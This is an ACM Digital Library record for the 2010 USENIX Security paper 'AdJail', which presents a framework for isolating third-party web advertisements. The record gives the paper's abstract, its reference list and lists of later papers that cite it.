Article

AdJail: practical enforcement of confidentiality and integrity policies on web advertisements

Authors:

Karthik Thotta Ganesh,

V. N. VenkatakrishnanAuthors Info & Claims

USENIX Security'10: Proceedings of the 19th USENIX conference on Security

Page 24

Published: 11 August 2010 Publication History

Abstract

Web publishers frequently integrate third-party advertisements into web pages that also contain sensitive publisher data and end-user personal data. This practice exposes sensitive page content to confidentiality and integrity attacks launched by advertisements. In this paper, we propose a novel framework for addressing security threats posed by third-party advertisements. The heart of our framework is an innovative isolation mechanism that enables publishers to transparently interpose between advertisements and end users. The mechanism supports finegrained policy specification and enforcement, and does not affect the user experience of interactive ads. Evaluation of our framework suggests compatibility with several mainstream ad networks, security from many threats from advertisements and acceptable performance overheads.

References

[1]

Adam Barth, Collin Jackson, and John C. Mitchell. Securing frame communication in browsers. In 17th USENIX Security Symposium, San Jose, CA, USA, July 2008.

[2]

Click Quality Team. How fictitious clicks occur in third-party click fraud audit reports. Technical report, Google, Inc., August 2006.

[3]

comScore. April 2009 U.S. ranking of top 25 ad networks. http://www.comscore.com/Press_Events/Press_ Releases/2009/5/Top_25_US_Ad_Networks, May 2009. Retrieved 19 Nov. 2009.

[4]

Sean Conaty. Introducing the 〈ispan〉. http:// nerdcereal.com/introducing-the-ispan/, January 2008. Retrieved 1 Jun. 2010.

[5]

Marco Cova, Christopher Kruegel, and Giovanni Vigna. Detection and analysis of drive-by-download attacks and malicious Java-Script code. In 19th International World Wide Web Conference, Raleigh, NC, USA, April 2010.

[6]

Douglas Crockford. ADsafe. http://www.adsafe.org/. Retrieved 1 Jun. 2010.

[7]

Douglas Crockford. The application/json media type for JavaScript object notation (JSON). http://tools.ietf.org/html/ rfc4627, July 2006. RFC 4627.

[8]

Úlfar Erlingsson, V. Benjamin Livshits, and Yinglian Xie. End-to-end web application security. In 11th Workshop on Hot Topics in Operating Systems, San Diego, CA, USA, May 2007.

[9]

Facebook Developers. Facebook JavaScript. http://wiki. developers.facebook.com/index.php/FBJS. Retrieved 8 Apr. 2010.

[10]

Adrienne Felt, Pieter Hooimeijer, David Evans, and Westley Weimer. Talking to strangers without taking their candy: Isolating proxied content. In 1st International Workshop on Social Network Systems, Glasgow, Scotland, April 2008.

[11]

Edward W. Felten and Michael A. Schneider. Timing attacks on web privacy. In 7th ACM Conference on Computer and Communications Security, Athens, Greece, November 2000.

[12]

Matthew Finifter, Joel Weinberger, and Adam Barth. Preventing capability leaks in secure JavaScript subsets. In 17th Annual Network & Distributed System Security Symposium, San Diego, CA, USA, March 2010.

[13]

Sean Ford, Marco Cova, Christopher Kruegel, and Giovanni Vigna. Analyzing and detecting malicious Flash advertisements. In 25th Annual Computer Security Applications Conference, Honolulu, HI, USA, December 2009.

[14]

Google Caja. A source-to-source translator for securing JavaScript-based web content. http://code.google.com/ p/google-caja/. Retrieved 1 Jun. 2010.

[15]

Saikat Guha, Bin Cheng, Alexy Reznichenko, Hamed Haddadi, and Paul Francis. Privad: Rearchitecting online advertising for privacy. Technical Report MPI-SWS-2009-004, Max Planck Institute for Software Systems, Kaiserslautern-Saarbruecken, Germany, October 2009.

[16]

Robert Hansen. XSS (cross site scripting) cheat sheet esp: for filter evasion. http://ha.ckers.org/xss.html, 2008. Retrieved 8 Apr. 2010.

[17]

Robert Hansen and Jeremiah Grossman. Clickjacking. http: //www.sectheory.com/clickjacking.htm, September 2008. Whitepaper.

[18]

Interactive Advertising Bureau. Interactive audience measurement and advertising campaign reporting and audit guidelines. Global Version 6.0b, IAB, September 2004.

[19]

Collin Jackson, Andrew Bortz, Dan Boneh, and John C. Mitchell. Protecting browser state from web privacy attacks. In 15th International World Wide Web Conference, Edinburgh, Scotland, May 2006.

[20]

Collin Jackson and Helen J. Wang. Subspace: Secure cross-domain communication for Web mashups. In 16th International World Wide Web Conference, Banff, AB, Canada, May 2007.

[21]

Trevor Jim, Nikhil Swamy, and Michael Hicks. Defeating script injection attacks with browser-enforced embedded policies. In 16th International World Wide Web Conference, Banff, AB, Canada, May 2007.

[22]

Haruka Kikuchi, Dachuan Yu, Ajay Chander, Hiroshi Inamura, and Igor Serikov. JavaScript instrumentation in practice. In 6th Asian Symposium on Programming Languages and Systems, Bangalore, India, December 2008.

[23]

Jeremy Kirk. Ad exploits Internet Explorer vulnerability to explose millions to adware. http://www.infoworld.com/print/ 23520, July 2006. Retrieved 23 Apr. 2010.

[24]

Mary Landesman. ScanSafe: Weekend run of malvertisements. http://blog.scansafe.com/journal/2009/9/24/ weekend-run-of-malvertisements.html, September 2009. Retrieved 23 Apr. 2010.

[25]

Travis Leithead. Document Object Model prototypes, Part 1: Introduction. http://msdn.microsoft.com/en-us/ library/dd282900%28VS.85%29.aspx, November 2008. Microsoft Corporation. Retrieved 22 May 2010.

[26]

Elias Levy and Iván Arce. Interface illusions. IEEE Security and Privacy, 2:66-69, 2004.

[27]

Zhenkai Liang, V. N. Venkatakrishnan, and R. Sekar. Isolated program execution: An application transparent approach for executing untrusted programs. In 19th Annual Computer Security Applications Conference, Las Vegas, NV, USA, December 2003. IEEE Computer Society.

[28]

V. Benjamin Livshits and Salvatore Guarnieri. Gatekeeper: Mostly static enforcement of security and reliability policies for JavaScript code. In 18th USENIX Security Symposium, Montreal, Canada, August 2009.

[29]

Sergio Maffeis, John C. Mitchell, and Ankur Taly. Language-based isolation of untrusted JavaScript. In 22nd IEEE Computer Security Foundations Symposium, Port Jefferson, NY, USA, July 2009.

[30]

Sergio Maffeis, John C. Mitchell, and Ankur Taly. Run-time enforcement of secure JavaScript subsets. In 3rd Workshop in Web 2.0 Security and Privacy, Oakland, CA, USA, May 2009.

[31]

Dahlia Malkhi and Michael K. Reiter. Secure execution of Java applets using a remote playground. IEEE Transactions on Software Engineering, 26(12):1197-1209, December 2000.

[32]

Gervase Markham. Content restrictions. http://www.gerv. net/security/content-restrictions/, March 2007.

[33]

Leo A. Meyerovich and V. Benjamin Livshits. ConScript: Specifying and enforcing fine-grained security policies for JavaScript in the browser. In IEEE Symposium on Security and Privacy, Oakland, CA, USA, May 2010.

[34]

Microsoft Live Labs. Web Sandbox. http://websandbox. livelabs.com. Retrieved 1 Jun. 2010.

[35]

Phu H. Phung, David Sands, and Andrey Chudnov. Lightweight self-protecting JavaScript. In ACM Symposium on Information, Computer and Communications Security, Sydney, Australia, March 2009.

[36]

Niels Provos, Panayiotis Mavrommatis, Moheeb Abu Rajab, and Fabian Monrose. All your iFRAMEs point to us. In 17th USENIX Security Symposium, San Jose, CA, USA, July 2008.

[37]

C. Reis, J. Dunagan, Helen J. Wang, O. Dubrovsky, and S. Esmeir. BrowserShield: Vulnerability-driven filtering of dynamic HTML. In 7th Symposium on Operating Systems Design and Implementation, Seattle, WA, USA, November 2006.

[38]

Matthew Rogers. Facebook's response to uproar over ads. http: //endofweb.co.uk/2009/07/facebook_ads_2/, July 2009. Retrieved 6 Apr. 2010.

[39]

Gustav Rydstedt, Elie Bursztein, Dan Boneh, and Collin Jackson. Busting frame busting: A study of clickjacking vulnerabilities on popular sites. In 4th Workshop in Web 2.0 Security and Privacy, Oakland, CA, USA, May 2010.

[40]

Jerome H. Saltzer and Michael D. Schroeder. The protection of information in computer systems. In 4th ACM Symposium on Operating Systems Principles, Yorktown Heights, NY, USA, October 1973.

[41]

Prateek Saxena, Dawn Song, and Yacin Nadji. Document structure integrity: A robust basis for cross-site scripting defense. In 16th Annual Network & Distributed System Security Symposium, San Diego, CA, USA, February 2009.

[42]

Barry Schnitt. Debunking rumors about advertising and photos. http://blog.facebook.com/blog.php?post= 110636457130, November 2009. Retrieved 6 Apr. 2010.

[43]

Sid Stamm, Brandon Sterne, and Gervase Markham. Reining in the Web with content security policy. In 19th International World Wide Web Conference, Raleigh, NC, USA, April 2010.

[44]

Weiqing Sun, Zhenkai Liang, R. Sekar, and V. N. Venkatakrishnan. One-way isolation: An efficient approach for realizing safe execution environments. In 12th Annual Network and Distributed System Security Symposium, San Diego, CA, USA, February 2005.

[45]

Mike Ter Louw, Prithvi Bisht, and V. N. Venkatakrishnan. Analysis of hypertext isolation techniques for cross-site scripting prevention. In 2nd Workshop in Web 2.0 Security and Privacy, Oakland, CA, USA, May 2008.

[46]

Mike Ter Louw and V. N. Venkatakrishnan. Blueprint: Robust prevention of cross-site scripting attacks for existing browsers. In IEEE Symposium on Security and Privacy, Oakland, CA, USA, May 2009.

[47]

Vincent Toubiana, Arvind Narayanan, Dan Boneh, Helen Nissenbaum, and Solon Barocas. Adnostic: Privacy preserving targeted advertising. In 17th Annual Network & Distributed System Security Symposium, San Diego, CA, USA, March 2010.

[48]

Ashlee Vance. Times Web ads show security breach. http: //www.nytimes.com/2009/09/15/technology/ internet/15adco.html, September 2009. NY Times. Retrieved 1 Jun. 2010.

[49]

Yi-Min Wang, Doug Beck, Xuxian Jiang, and Roussi Roussev. Automated Web patrol with Strider HoneyMonkeys: Finding Web sites that exploit browser vulnerabilities. In 13th Annual Network and Distributed System Security Symposium, San Diego, CA, USA, February 2006.

[50]

Wikipedia contributors. Same origin policy. http: //en.wikipedia.org/w/index.php?title=Same_ origin_policy&oldid=190222964, February 2008.

[51]

World Wide Web Consortium. Document object model (DOM) level 2 events specification. http://www.w3.org/TR/ DOM-Level-2-Events, November 2000.

[52]

Yankee Group. Yankee Group forecasts US online advertising market to reach $50 billion by 2011. http: //www.yankeegroup.com/pressReleaseDetail. do?actionType=getDetailPressRelease&ID=1805, January 2008. Retrieved 6 Apr. 2010.

[53]

Dachuan Yu, Ajay Chander, Nayeem Islam, and Igor Serikov. JavaScript instrumentation for browser security. In 34th Annual ACM SIGPLAN-SIGACT Symposium on Principles of Programming Languages, Nice, France, January 2007.

[54]

Michal Zalewski. Browser security handbook. http://code. google.com/p/browsersec/wiki/Main, 2009. Retrieved 26 Jan. 2010.

Cited By

Ferreira GJia LSunshine JKästner C(2021)Containing Malicious Package Updates in npm with a Lightweight Permission SystemProceedings of the 43rd International Conference on Software Engineering10.1109/ICSE43902.2021.00121(1334-1346)Online publication date: 22-May-2021
https://dl.acm.org/doi/10.1109/ICSE43902.2021.00121
Musch MSteffens MRoth SStock BJohns MGalbraith SRussello GSusilo WGollmann DKirda ELiang Z(2019)ScriptProtectProceedings of the 2019 ACM Asia Conference on Computer and Communications Security10.1145/3321705.3329841(391-402)Online publication date: 2-Jul-2019
https://dl.acm.org/doi/10.1145/3321705.3329841
Wang WKwon YZheng YAafer YKim ILee WLiu YMeng WZhang XEugster PRosu GDi Penta MNguyen T(2017)PAD: programming third-party web advertisement censorshipProceedings of the 32nd IEEE/ACM International Conference on Automated Software Engineering10.5555/3155562.3155596(240-251)Online publication date: 30-Oct-2017
https://dl.acm.org/doi/10.5555/3155562.3155596
Show More Cited By

Index Terms

AdJail: practical enforcement of confidentiality and integrity policies on web advertisements
1. Security and privacy

Index terms have been assigned to the content through auto-classification.

Recommendations

Comments

Information & Contributors

Information

Published In

cover image Guide Proceedings

USENIX Security'10: Proceedings of the 19th USENIX conference on Security

August 2010

30 pages

ISBN:8887666655554

Program Chair:
Ian Goldberg
University of Waterloo

Sponsors

NSF: National Science Foundation
Google Inc.
IBMR: IBM Research
Microsoft Research: Microsoft Research
RSA: The Security Division of EMC

Publisher

USENIX Association

United States

Publication History

Published: 11 August 2010

Qualifiers

Article

Contributors

Other Metrics

View Article Metrics

Bibliometrics & Citations

Bibliometrics

Article Metrics

37
Total Citations
View Citations
1
Total Downloads

Downloads (Last 12 months)0
Downloads (Last 6 weeks)0

Reflects downloads up to 27 Jul 2024

Other Metrics

View Author Metrics

Citations

Cited By

Ferreira GJia LSunshine JKästner C(2021)Containing Malicious Package Updates in npm with a Lightweight Permission SystemProceedings of the 43rd International Conference on Software Engineering10.1109/ICSE43902.2021.00121(1334-1346)Online publication date: 22-May-2021
https://dl.acm.org/doi/10.1109/ICSE43902.2021.00121
Musch MSteffens MRoth SStock BJohns MGalbraith SRussello GSusilo WGollmann DKirda ELiang Z(2019)ScriptProtectProceedings of the 2019 ACM Asia Conference on Computer and Communications Security10.1145/3321705.3329841(391-402)Online publication date: 2-Jul-2019
https://dl.acm.org/doi/10.1145/3321705.3329841
Wang WKwon YZheng YAafer YKim ILee WLiu YMeng WZhang XEugster PRosu GDi Penta MNguyen T(2017)PAD: programming third-party web advertisement censorshipProceedings of the 32nd IEEE/ACM International Conference on Automated Software Engineering10.5555/3155562.3155596(240-251)Online publication date: 30-Oct-2017
https://dl.acm.org/doi/10.5555/3155562.3155596
Afanasyev AHalderman JRuoti SSeamons KYu YZappala DZhang LGates CBöhme REgelman SMannan M(2016)Content-based security for the webProceedings of the 2016 New Security Paradigms Workshop10.1145/3011883.3011890(49-60)Online publication date: 26-Sep-2016
https://dl.acm.org/doi/10.1145/3011883.3011890
Shu RWang PGorski III SAndow BNadkarni ADeshotels LGionta JEnck WGu X(2016)A Study of Security Isolation TechniquesACM Computing Surveys10.1145/298854549:3(1-37)Online publication date: 12-Oct-2016
https://dl.acm.org/doi/10.1145/2988545
Van Acker SHausknecht DSabelfeld AChen XWang XHuang X(2016)Data Exfiltration in the Face of CSPProceedings of the 11th ACM on Asia Conference on Computer and Communications Security10.1145/2897845.2897899(853-864)Online publication date: 30-May-2016
https://dl.acm.org/doi/10.1145/2897845.2897899
Van Acker SSabelfeld A(2016)JavaScript SandboxingTutorial Lectures on Foundations of Security Analysis and Design VIII - Volume 980810.1007/978-3-319-43005-8_2(32-86)Online publication date: 1-Jun-2016
https://dl.acm.org/doi/10.1007/978-3-319-43005-8_2
Wressnegger CYamaguchi FArp DRieck K(2016)Comprehensive Analysis and Detection of Flash-Based MalwareProceedings of the 13th International Conference on Detection of Intrusions and Malware, and Vulnerability Assessment - Volume 972110.1007/978-3-319-40667-1_6(101-121)Online publication date: 7-Jul-2016
https://dl.acm.org/doi/10.1007/978-3-319-40667-1_6
Tran TPelizzi RSekar R(2015)JaTEProceedings of the 31st Annual Computer Security Applications Conference10.1145/2818000.2818019(151-160)Online publication date: 7-Dec-2015
https://dl.acm.org/doi/10.1145/2818000.2818019
Georgiev MJana SShmatikov VGangemi ALeonardi SPanconesi A(2015)Rethinking Security of Web-Based System ApplicationsProceedings of the 24th International Conference on World Wide Web10.1145/2736277.2741663(366-376)Online publication date: 18-May-2015
https://dl.acm.org/doi/10.1145/2736277.2741663
Show More Cited By

View Options

View options

Media

Figures

Other

Tables

View Table of Contents